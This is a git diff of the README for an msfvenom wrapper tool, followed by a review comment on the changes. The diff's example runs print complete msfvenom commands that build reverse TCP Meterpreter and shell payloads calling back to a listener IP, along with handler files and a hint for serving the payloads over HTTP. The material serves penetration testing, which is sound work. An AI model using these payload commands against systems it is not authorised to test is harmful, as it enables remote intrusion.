diff --git a/README.md b/README.md index b242514..20cba46 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ A **quick** way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework). -![Msfvenom Payload Creator (MPC)](https://i.imgur.com/pLmIlAm.png) +![Msfvenom Payload Creator (MPC)](https://i.imgur.com/0q41eqR.png) - - - 
@@ -29,88 +29,116 @@ mpc ``` bash root@kali:~# mpc - [*] Msfvenom Payload Creator (MPC v1.1) + [*] Msfvenom Payload Creator (MPC v1.2) + + [i] /usr/bin/mpc () () () () () () + [i] Example: /usr/bin/mpc windows 192.168.1.10 # Windows & manual IP. + [i] /usr/bin/mpc elf eth0 4444 # Linux, eth0's IP & manual port. + [i] /usr/bin/mpc stageless cmd py verbose # Python, stageless command prompt. + [i] /usr/bin/mpc loop eth1 # A payload for every type, using eth1's IP. + [i] /usr/bin/mpc msf batch eth1 # All possible Meterpreter payloads, using eth1's IP. - [i] ./mpc.sh () () [i] : (All reverse TCP payloads) - [i] + ASP (meterpreter) - [i] + ASPX (meterpreter) - [i] + Bash [.sh] (shell) - [i] + Java [.jsp] (shell) - [i] + Linux [.elf] (meterpreter) - [i] + OSX [.macho] (shell) - [i] + Perl [.pl] (shell) - [i] + PHP (meterpreter) - [i] + Powershell [.ps1] (meterpreter) - [i] + Python [.py] (meterpreter) - [i] + Tomcat [.war] (shell) - [i] + Windows [.exe] (meterpreter) - [i] Missing will default to IP menu - [i] Missing will default to 443 + [i] + ASP + [i] + ASPX + [i] + Bash [.sh] + [i] + Java [.jsp] + [i] + Linux [.elf] + [i] + OSX [.macho] + [i] + Perl [.pl] + [i] + PHP + [i] + Powershell [.ps1] + [i] + Python [.py] + [i] + Tomcat [.war] + [i] + Windows [.exe] + + [i] Rather than putting , you can do a interface and MPC will detect that IP address. + [i] Missing will default to the IP menu. + + [i] Missing will default to 443. + + [i] splits the payload into parts, making it smaller but dependant on Metasploit. + [i] is the complete standalone payload. More 'stabe' than . + [i] Missing will default to . + [i] Note: Metasploit doesn't (yet!) support for every format. + + [i] is a standard/native command prompt/terminal to interactive with. + [i] is a custom cross platform Meterpreter shell, gaining the full power of Metasploit. + [i] Note: Metasploit doesn't (yet!) support / for every format. + [i] Missing will default to Meterpreter. 
+ + [i] will generate as many combinations as possible: , & . + [i] will just create one of each . + + [i] will display more information during the process. root@kali:~# ``` -## Example \#1 (Windows Fully Automated With IP And Port) +## Example \#1 (Windows, Fully Automated With IP) ```bash -root@kali:~# mpc windows 192.168.155.175 4444 - [*] Msfvenom Payload Creator (MPC v1.1) - [i] IP: 192.168.155.175 - [i] PORT: 4444 - [i] TYPE: windows (windows/meterpreter/reverse_tcp) - [i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.155.175 LPORT=4444 -o /root/windows-meterpreter.exe - [i] windows meterpreter created: '/root/windows-meterpreter.exe' - [i] MSF handler file: '/root/windows-meterpreter-exe.rc' (msfconsole -q -r /root/windows-meterpreter-exe.rc) - [?] Quick web server? python -m SimpleHTTPServer 8080 +root@kali:~# mpc windows 192.168.1.10 + [*] Msfvenom Payload Creator (MPC v1.2) + [i] IP: 192.168.1.10 + [i] PORT: 443 + [i] TYPE: windows (windows/meterpreter_reverse_tcp) + [i] CMD: msfvenom -p windows/meterpreter_reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 -o /root/windows-stageless-meterpreter-443.exe + [i] windows meterpreter created: '/root/windows-stageless-meterpreter-443.exe' + [i] MSF handler file: '/root/windows-stageless-meterpreter-443-exe.rc' (msfconsole -q -r /root/windows-stageless-meterpreter-443-exe.rc) + [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080 [*] Done! 
root@kali:~# ``` -## Example \#2 (Linux Fully Automated With Interface And Format) +## Example \#2 (Linux Format, Fully Automated With Interface and Port) ```bash -root@kali:~# ./mpc.sh elf eth0 - [*] Msfvenom Payload Creator (MPC v1.1) - [i] IP: 127.0.0.1 - [i] PORT: 443 - [i] TYPE: linux (linux/x86/meterpreter/reverse_tcp) - [i] CMD: msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=127.0.0.1 LPORT=443 -o /root/linux-meterpreter.elf - [i] linux meterpreter created: '/root/linux-meterpreter.elf' - [i] MSF handler file: '/root/linux-meterpreter-elf.rc' (msfconsole -q -r /root/linux-meterpreter-elf.rc) - [?] Quick web server? python -m SimpleHTTPServer 8080 +root@kali:~# ./mpc elf eth0 4444 + [*] Msfvenom Payload Creator (MPC v1.2) + [i] IP: 192.168.103.240 + [i] PORT: 4444 + [i] TYPE: linux (linux/x86/meterpreter/reverse_tcp) + [i] CMD: msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.240 LPORT=4444 -o /root/linux-staged-meterpreter-4444.elf + [i] linux meterpreter created: '/root/linux-staged-meterpreter-4444.elf' + [i] MSF handler file: '/root/linux-staged-meterpreter-4444-elf.rc' (msfconsole -q -r /root/linux-staged-meterpreter-4444-elf.rc) + [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080 [*] Done! root@kali:~# ``` -## Example \#3 (PHP Using Interactive IP Menu) +## Example \#3 (Python Format, Stageless Command Prompt Using Interactive IP Menu) ```bash -root@kali:~# bash mpc.sh php - [*] Msfvenom Payload Creator (MPC v1.1) +root@kali:~# bash mpc.sh stageless cmd py verbose + [*] Msfvenom Payload Creator (MPC v1.2) [i] Use which interface/IP address?: - [i] 1.) eth0 - 192.168.103.140 + [i] 1.) eth0 - 192.168.103.240 [i] 2.) eth1 - 192.168.155.175 [i] 3.) lo - 127.0.0.1 - [?] 
Select 1-3, interface or IP address: 1 - - [i] IP: 192.168.103.140 - [i] PORT: 443 - [i] TYPE: php (php/meterpreter/reverse_tcp) - [i] CMD: msfvenom -p php/meterpreter/reverse_tcp -f raw --platform php -e generic/none -a php LHOST=192.168.103.140 LPORT=443 -o /root/php-meterpreter.php - [i] php meterpreter created: '/root/php-meterpreter.php' - [i] MSF handler file: '/root/php-meterpreter-php.rc' (msfconsole -q -r /root/php-meterpreter-php.rc) - [?] Quick web server? python -m SimpleHTTPServer 8080 + [?] Select 1-3, interface or IP address: 2 + + [i] IP: 192.168.155.175 + [i] PORT: 443 + [i] TYPE: python (python/shell_reverse_tcp) + [i] STAGE: stageless + [i] SHELL: shell + [i] CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.155.175 LPORT=443 -o /root/python-stageless-shell-443.py + [i] python shell created: '/root/python-stageless-shell-443.py' + [i] MSF handler file: '/root/python-stageless-shell-443-py.rc' (msfconsole -q -r /root/python-stageless-shell-443-py.rc) + [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080 [*] Done! root@kali:~# ``` +![Examples](https://i.imgur.com/m4lG23l.png) + - - - ## To-Do List -* Cleaner command line arguments (e.g. `-ip 127.0.0.1`, `-v` etc) * Display file stats (e.g. file, size, md5/sha1) _Commands are in, just commented out._ -* Support different payloads (e.g. `standard shells`/`nc` & `reverse_http`/`reverse_https`, `bind` etc) +* Support different payloads (e.g. `reverse_http`/`reverse_https`, `bind`, `find_port` etc) * x64 payloads +* external IP/WAN * _...IPv6 support?_
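Review bot: in the second hunk (`@@ -29,88 +29,116 @@`), the new examples disagree about what happens when no stage is given, and the help text does not settle it. Example #1 (`mpc windows 192.168.1.10`) reports `windows/meterpreter_reverse_tcp` and writes `windows-stageless-meterpreter-443.exe`, while Example #2 (`./mpc elf eth0 4444`) reports `linux/x86/meterpreter/reverse_tcp` and writes `linux-staged-meterpreter-4444.elf`; neither command names a stage. Please state the default in the help block and say explicitly that the tool falls back to the other mode where Metasploit lacks support for the format, so a reader can predict which handler and file name they will get. The `STAGE:` and `SHELL:` lines only appear in Example #3, which passes `verbose`; showing them in every run would make the choice visible. Smaller points in the same hunk: the added help text has typos (`dependant` should be `dependent`, `'stabe'` should be `'stable'`, `to interactive with` should be `to interact with`, `you can do a interface` should be `you can give an interface`), and the three examples invoke the tool three different ways (`mpc`, `./mpc`, `bash mpc.sh`) while the usage text prints `/usr/bin/mpc`, so pick one. Finally, the reworded hint `python -m SimpleHTTPServer 8080` is shown at a `root@kali:~#` prompt with output files in `/root`; run from there it serves the whole of `/root` on every interface without authentication, and the module exists only in Python 2. The README should suggest running it from a directory that holds only the generated file, and mention `python3 -m http.server` as the Python 3 equivalent.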